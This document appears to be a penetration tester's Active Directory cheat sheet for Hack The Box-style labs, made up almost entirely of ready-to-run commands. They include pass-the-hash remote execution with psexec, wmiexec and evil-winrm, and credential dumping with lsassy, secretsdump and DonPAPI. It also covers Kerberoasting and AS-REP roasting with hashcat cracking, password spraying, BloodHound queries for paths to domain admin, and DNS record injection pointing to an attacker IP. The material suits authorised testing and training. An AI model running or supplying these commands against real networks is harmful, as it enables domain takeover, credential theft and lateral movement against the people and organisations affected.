With Creds
nxc smb RHOST -u 'USER' -p 'PASS' --shares -x whoami
nxc rdp RHOST -u 'USER' -p 'PASS'
nxc winrm RHOST -u 'USER' -p 'PASS' -x whoami
nxc wmi RHOST -u 'USER' -p 'PASS' -x whoami
nxc mssql RHOST -u 'USER' -p 'PASS' -x whoami
nxc ldap RHOST -u 'USER' -p 'PASS'
nxc ldap RHOST -u 'USER' -p 'PASS' -M adcs
nxc smb RHOST -u 'USER' -p 'PASS' --shares -x whoami --local-auth
nxc smb RHOST -u 'USER' -p 'PASS' --shares --put-file rustscan.exe /windows/temp/rustscan.exe
nxc smb RHOST -u 'USER' --local-auth -H 3e1aef05e1b65e4f3cee0e60b0eba2de
nxc smb RHOST -u 'Administrator' -p 'PASS' -M lsassy
nxc ldap ghost.htb -u 'USER' -p 'PASS' --gmsa
enum4linux RHOST -u 'USER' -p 'PASS'
mssqlclient.py 'USER':'PASS'@RHOST -debug -windows-auth
mkdir /tmp/share
xfreerdp /port:3389 /v:1.2.3.4 /d:DOMAIN /u:hackerbeepboop /p:Blabliblou_1 +clipboard /cert:ignore /dynamic-resolution /drive:/tmp/share,share
xfreerdp /port:3389 /v:1.2.3.4 /d:DOMAIN /u:user /pth:3e1aef05e1b65e4f3cee0e60b0eba2de +clipboard /cert:ignore /dynamic-resolution /drive:/tmp/share,share
psexec.py 'domain.local'/'Administrator':'pass'@1.2.3.4
psexec.py 'Administrator':'pass'@1.2.3.4
psexec.py -hashes ":e7db1b821fac71d089d0b42d4a5bf605" Administrator@1.2.3.4 powershell.exe
smbexec.py 'Administrator':'pass'@1.2.3.4
secretsdump.py Administrator:'pass'@1.2.3.4 -history
secretsdump.py user@1.2.3.4 -hashes ':3e1aef05e1b65e4f3cee0e60b0eba2de' -history
donpapi collect -u Administrator -p 'pass' -d domain.local -t 1.2.3.4 --fetch-pvk
wmiexec.py 'user':'pass'@1.2.3.4 'powershell.exe "whoami /all"'
atexec.py 'user':'pass'@1.2.3.4 whoami
dcomexec.py 'user':'pass'@1.2.3.4 'whoami'
dcomexec.py -object MMC20 'user':'pass'@1.2.3.4 '\\4.3.2.1\test' -nooutput # test for execution, listen on 445 first
evil-winrm -i domain.com -u user -p 'pass' # Don't forget to add the domain to /etc/hosts
Kerberos
Getting a Kerberos TGT (ccache)
getTGT.py 'BOX.HTB'/'USER':'PASS' -dc-ip 'DC01.BOX.HTB'
getTGT.py 'BOX.HTB'/'GMSA01' -hashes ':cfa8f6edd15de88a17a9652114e3f4a6' -dc-ip 'DC01.BOX.HTB'
export KRB5CCNAME=USER.ccache
nxc smb DC01.BOX.HTB -k --use-kcache
wmiexec.py -k DC01.BOX.HTB 'powershell.exe "whoami /all"'
cat <<'EOF'>/home/user/data/krb5.conf
[libdefaults]
default_realm = BOX.HTB
dns_canonicalize_hostname = false
rdns = false
[realms]
BOX.HTB = {
kdc = DC01.BOX.HTB
admin_server = DC01.BOX.HTB
}
[domain_realm]
BOX.HTB = BOX.HTB
.BOX.HTB = BOX.HTB
web.BOX.HTB = BOX.HTB
EOF
export KRB5_CONFIG='/home/user/data/krb5.conf'
export KRB5CCNAME='/home/user/data/user.ccache'
export KRB5_TRACE='/dev/stdout'
evil-winrm -i 'DC01.BOX.HTB' -r 'BOX.HTB' -u 'USER'
Active Directory
LDAP enumeration
ldapsearch -H 'ldap://domain.com' -D user@domain.com -w 'pass' -b "dc=domain,dc=com" "*" > /home/user/data/ldapsearch
ldeep ldap -u user -p 'pass' -d domain.com -s ldaps://1.2.3.4:636 all /home/user/data/ldeep
ldapdomaindump ldaps://1.2.3.4:3269 -u 'domain.com\user' -p 'pass'
Kerberoasting
GetUserSPNs.py -dc-ip 1.2.3.10 'domain.com/user:pass' -request -outputfile /home/user/data/hashes.kerberoast
hashcat -m 13100 -a 0 /home/user/data/hashes.kerberoast /usr/share/wordlists/rockyou.txt --potfile-path=/home/user/HASHCATPOT
Bloodhound
Install BloodHound from https://github.com/SpecterOps/BloodHound
BloodHound: v7.3.1
Using the Python collector to extract information
pipx install git+https://github.com/dirkjanm/BloodHound.py@bloodhound-ce
bloodhound-ce-python --dns-tcp -u 'USER' -p 'PASS' -ns '10.129.41.25' -d 'BOX.htb' -c All,LoggedOn
Get all descriptions, users and computers
cat *.json|jq|grep -i '"description"'| cut '-d"' -f4 | sort -u | tee /home/user/data/descriptions
cat *users.json|jq|grep -i '"samaccountname"' | cut '-d"' -f4 | tee /home/user/data/users
cat *computers.json|jq|grep -i '"samaccountname"' | cut '-d"' -f4 | tee /home/user/data/computers
Enumeration
# Group membership of all users, excluding default low-privilege groups (Users, Everyone, ...)
WITH ['-513', '-S-1-1-0', '-S-1-5-11', '-S-1-5-32-554', '-S-1-5-32-545'] AS usergroups MATCH p=(u:User)-[r:MemberOf*1..]->(g:Group) WHERE NOT ANY(group IN usergroups WHERE g.objectid ENDS WITH group) RETURN p
# Domains and computers
MATCH p1 = (d:Domain) OPTIONAL MATCH p2 = (d:Domain)-[:Contains*1..]->(c:Computer) OPTIONAL MATCH p3 = shortestPath((d:Domain)-[*1..]->(n:Domain)) WHERE d<>n WITH collect(p1) + collect(p2) + collect(p3) AS paths UNWIND paths AS path RETURN path
# Users ACL
MATCH p=(u:User)-[r1]->(n) WHERE r1.isacl=true RETURN p
# Search for relations/activity between users and computers
WITH ['-512','-544'] AS exclude MATCH p1=(d:Domain)-[:Contains*1..]->(c:Computer) OPTIONAL MATCH p2=(n)-[r:CanRDP|CanPSRemote|ExecuteDCOM|AdminTo|Owns]->(:Computer) WHERE NOT ANY(x IN exclude WHERE n.objectid ENDS WITH x) OPTIONAL MATCH p3=(:Computer)-[:HasSession]->() WITH collect(p1) + collect(p2) + collect(p3) AS paths UNWIND paths AS path RETURN path
WITH ['-512','-544'] AS exclude MATCH p=(n)-[:HasSession|CanRDP|CanPSRemote|ExecuteDCOM|AdminTo*1..]->() WHERE NOT ANY(x IN exclude WHERE n.objectid ENDS WITH x) RETURN p
# GPOs
MATCH p1=()-[r:Owns]->(c:GPO) OPTIONAL MATCH p2=()-[:GPLink]->() WITH collect(p1) + collect(p2) AS paths UNWIND paths AS path RETURN path
MATCH p1=()-[r:Owns]->(c:GPO) RETURN p1
Leverage Owned objects
# Owned objects => high-value targets (excluding the CanRDP, CanPSRemote and HasSession edges)
MATCH (m),(n),p=shortestPath((m)-[:MemberOf|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GPLink|AddAllowedToAct|AllowedToAct|WriteAccountRestrictions|SQLAdmin|ReadGMSAPassword|HasSIDHistory|SyncLAPSPassword|DumpSMSAPassword|AZMGGrantRole|AZMGAddSecret|AZMGAddOwner|AZMGAddMember|AZMGGrantAppRoles|AZNodeResourceGroup|AZWebsiteContributor|AZLogicAppContributo|AZAutomationContributor|AZAKSContributor|AZAddMembers|AZAddOwner|AZAddSecret|AZAvereContributor|AZContains|AZContributor|AZExecuteCommand|AZGetCertificates|AZGetKeys|AZGetSecrets|AZGlobalAdmin|AZHasRole|AZManagedIdentity|AZMemberOf|AZOwns|AZPrivilegedAuthAdmin|AZPrivilegedRoleAdmin|AZResetPassword|AZUserAccessAdministrator|AZAppAdmin|AZCloudAppAdmin|AZRunsAs|AZKeyVaultContributor|AZVMAdminLogin|AZVMContributor|AZLogicAppContributor|AddSelf|WriteSPN|AddKeyCredentialLink|DCSync*1..]->(n)) WHERE m<>n and COALESCE(m.system_tags, '') CONTAINS 'owned' and COALESCE(n.system_tags, '') CONTAINS 'admin_tier_0' RETURN p
# Owned => Computers
MATCH (m),(n:Computer),p=shortestPath((m)-[:CanRDP|CanPSRemote|MemberOf|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GPLink|AddAllowedToAct|AllowedToAct|WriteAccountRestrictions|SQLAdmin|ReadGMSAPassword|HasSIDHistory|SyncLAPSPassword|DumpSMSAPassword|AZMGGrantRole|AZMGAddSecret|AZMGAddOwner|AZMGAddMember|AZMGGrantAppRoles|AZNodeResourceGroup|AZWebsiteContributor|AZLogicAppContributo|AZAutomationContributor|AZAKSContributor|AZAddMembers|AZAddOwner|AZAddSecret|AZAvereContributor|AZContains|AZContributor|AZExecuteCommand|AZGetCertificates|AZGetKeys|AZGetSecrets|AZGlobalAdmin|AZHasRole|AZManagedIdentity|AZMemberOf|AZOwns|AZPrivilegedAuthAdmin|AZPrivilegedRoleAdmin|AZResetPassword|AZUserAccessAdministrator|AZAppAdmin|AZCloudAppAdmin|AZRunsAs|AZKeyVaultContributor|AZVMAdminLogin|AZVMContributor|AZLogicAppContributor|AddSelf|WriteSPN|AddKeyCredentialLink|DCSync*1..]->(n)) WHERE m<>n and COALESCE(m.system_tags, '') CONTAINS 'owned' OPTIONAL MATCH p2=(n:Computer)-[r:HasSession]->(m:User) WHERE COALESCE(m.system_tags, '') CONTAINS 'owned' WITH collect(p) + collect(p2) AS paths UNWIND paths AS path RETURN path
Easy wins
# Users/Computers => high-value targets (excluding the CanRDP, CanPSRemote and HasSession edges)
MATCH (m:User),(n),p=shortestPath((m)-[:MemberOf|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GPLink|AddAllowedToAct|AllowedToAct|WriteAccountRestrictions|SQLAdmin|ReadGMSAPassword|HasSIDHistory|SyncLAPSPassword|DumpSMSAPassword|AZMGGrantRole|AZMGAddSecret|AZMGAddOwner|AZMGAddMember|AZMGGrantAppRoles|AZNodeResourceGroup|AZWebsiteContributor|AZLogicAppContributo|AZAutomationContributor|AZAKSContributor|AZAddMembers|AZAddOwner|AZAddSecret|AZAvereContributor|AZContains|AZContributor|AZExecuteCommand|AZGetCertificates|AZGetKeys|AZGetSecrets|AZGlobalAdmin|AZHasRole|AZManagedIdentity|AZMemberOf|AZOwns|AZPrivilegedAuthAdmin|AZPrivilegedRoleAdmin|AZResetPassword|AZUserAccessAdministrator|AZAppAdmin|AZCloudAppAdmin|AZRunsAs|AZKeyVaultContributor|AZVMAdminLogin|AZVMContributor|AZLogicAppContributor|AddSelf|WriteSPN|AddKeyCredentialLink|DCSync*1..]->(n)) WHERE m<>n and COALESCE(n.system_tags, '') CONTAINS 'admin_tier_0' RETURN p
MATCH (m:Computer),(n),p=shortestPath((m)-[:MemberOf|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GPLink|AddAllowedToAct|AllowedToAct|WriteAccountRestrictions|SQLAdmin|ReadGMSAPassword|HasSIDHistory|SyncLAPSPassword|DumpSMSAPassword|AZMGGrantRole|AZMGAddSecret|AZMGAddOwner|AZMGAddMember|AZMGGrantAppRoles|AZNodeResourceGroup|AZWebsiteContributor|AZLogicAppContributo|AZAutomationContributor|AZAKSContributor|AZAddMembers|AZAddOwner|AZAddSecret|AZAvereContributor|AZContains|AZContributor|AZExecuteCommand|AZGetCertificates|AZGetKeys|AZGetSecrets|AZGlobalAdmin|AZHasRole|AZManagedIdentity|AZMemberOf|AZOwns|AZPrivilegedAuthAdmin|AZPrivilegedRoleAdmin|AZResetPassword|AZUserAccessAdministrator|AZAppAdmin|AZCloudAppAdmin|AZRunsAs|AZKeyVaultContributor|AZVMAdminLogin|AZVMContributor|AZLogicAppContributor|AddSelf|WriteSPN|AddKeyCredentialLink|DCSync*1..]->(n)) WHERE m<>n and COALESCE(n.system_tags, '') CONTAINS 'admin_tier_0' RETURN p
# Users => Computers
MATCH (m:User),(n:Computer),p=shortestPath((m)-[:CanRDP|CanPSRemote|MemberOf|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GPLink|AddAllowedToAct|AllowedToAct|WriteAccountRestrictions|SQLAdmin|ReadGMSAPassword|HasSIDHistory|SyncLAPSPassword|DumpSMSAPassword|AZMGGrantRole|AZMGAddSecret|AZMGAddOwner|AZMGAddMember|AZMGGrantAppRoles|AZNodeResourceGroup|AZWebsiteContributor|AZLogicAppContributo|AZAutomationContributor|AZAKSContributor|AZAddMembers|AZAddOwner|AZAddSecret|AZAvereContributor|AZContains|AZContributor|AZExecuteCommand|AZGetCertificates|AZGetKeys|AZGetSecrets|AZGlobalAdmin|AZHasRole|AZManagedIdentity|AZMemberOf|AZOwns|AZPrivilegedAuthAdmin|AZPrivilegedRoleAdmin|AZResetPassword|AZUserAccessAdministrator|AZAppAdmin|AZCloudAppAdmin|AZRunsAs|AZKeyVaultContributor|AZVMAdminLogin|AZVMContributor|AZLogicAppContributor|AddSelf|WriteSPN|AddKeyCredentialLink|DCSync*1..]->(n)) WHERE m<>n OPTIONAL MATCH p2=(n:Computer)-[r:HasSession]->(m:User) WITH collect(p) + collect(p2) AS paths UNWIND paths AS path RETURN path
# Any unconstrained delegation?
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
# Any constrained delegation?
MATCH p=()-[r:AllowedToDelegate|AllowedToAct]->() RETURN p
MATCH (c:Computer), (t:Computer), p=((c)-[:AllowedToDelegate|AllowedToAct]->(t)) return p
# Kerberoastable users (SPN set)?
MATCH (n:User) WHERE n.hasspn=true RETURN n
# GetUserSPNs.py -dc-ip 1.2.3.10 'do.main/user:pass' -request -outputfile /home/user/data/hashes.kerberoast
# Or : nxc ldap 1.2.3.10 -d 'do.main' -u 'user' -p 'pass' --kerberoast /home/user/data/hashes.kerberoast
# hashcat -m 13100 -a 0 /home/user/data/hashes.kerberoast /usr/share/wordlists/rockyou.txt --potfile-path=HASHCATPOT
# Users that do not require Kerberos pre-authentication?
MATCH (u:User {dontreqpreauth: true}) RETURN u
# GetNPUsers.py -debug 'do.main/' -usersfile /home/user/data/users -outputfile /home/user/data/hashes.asreproast -format hashcat -dc-ip 1.2.3.10
# sudo hashcat -m 18200 /home/user/data/hashes.asreproast /usr/share/wordlists/rockyou.txt --potfile-path=HASHCATPOT
# Pre-created computer accounts? (then try either a blank password or the computer's lowercase name without the trailing $ as the password)
MATCH p = (d:Domain)-[r:Contains*1..]->(c:Computer) WHERE c.pwdlastset = c.whencreated and c.enabled = true RETURN p
MATCH p = (d:Domain)-[r:Contains*1..]->(c:Computer) WHERE c.pwdlastset < c.lastlogon - (60*60*24*45) and c.enabled = true RETURN p
cat /home/user/data/computers | tr '[:upper:]' '[:lower:]' | tr -d '$' > /home/user/data/computerspass
# nxc smb DC01 -u /home/user/data/computers -p /home/user/data/computerspass --continue-on-success --no-bruteforce
# The pre2k tool can be used for this check as well
# Ref https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts
Others (testing)
MATCH p=()-[r:HasSession]->() RETURN p
MATCH p=()-[r:Owns]->(c:Computer) RETURN p
Match (n:GPO) return n
MATCH p=(u:User)-[]->() RETURN p
MATCH p=(u:User)-[r:GenericAll]->() RETURN p
MATCH p=()-[r:GenericAll]->() RETURN p
# Domain Users
MATCH p=(d:Domain)-[r:Contains*1..]->(n:User) RETURN p
# Map of domains/groups/users
MATCH p=(d:Domain)-[r:Contains*1..]->(n:Group)<-[s:MemberOf]-(u:User) RETURN p
MATCH (m),(n:OU),p=shortestPath((m)-[*1..]->(n)) where m<>n RETURN p
MATCH p=()-[r:ADCSESC1|ADCSESC3|ADCSESC4|ADCSESC6a|ADCSESC6b|ADCSESC9a|ADCSESC9b|ADCSESC10a|ADCSESC10b|ADCSESC13]->() RETURN p
ADIDNS
Active Directory services need DNS in order to function properly.
For that purpose, Active Directory Domain Services (AD-DS) offer an integrated storage and replication service for DNS records.
This is called Active Directory Integrated DNS (ADIDNS).
If the user has sufficient rights, they can add DNS records.
# Example using a Kerberos ticket
export KRB5CCNAME="/home/user/data/user.ccache"
python3 dnstool.py -u 'DOMAIN.HTB\user' -k "DC01.DOMAIN.HTB" --tcp -r intranet.DOMAIN.HTB -a add -d ATTACKERIP -dns-ip DNSSRVIP
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
# Example when you don't have enough rights
python3 dnstool.py -u 'DOMAIN.HTB\user' -p 'pass' 'DC01.DOMAIN.HTB' -r intranet.DOMAIN.HTB -a add -d ATTACKERIP -dns-ip DNSSRVIP
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[!] LDAP operation failed. Message returned from server: insufficientAccessRights 00000005: SecErr: DSID-03152E29, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0
Adding a record using bloodyAD
bloodyAD --host 1.2.3.4 -d 'domain.htb' -u 'USER' -p 'PASS' add dnsRecord test 10.10.14.56
bloodyAD --host 1.2.3.4 -d 'domain.htb' -u 'USER' -p 'PASS' get dnsDump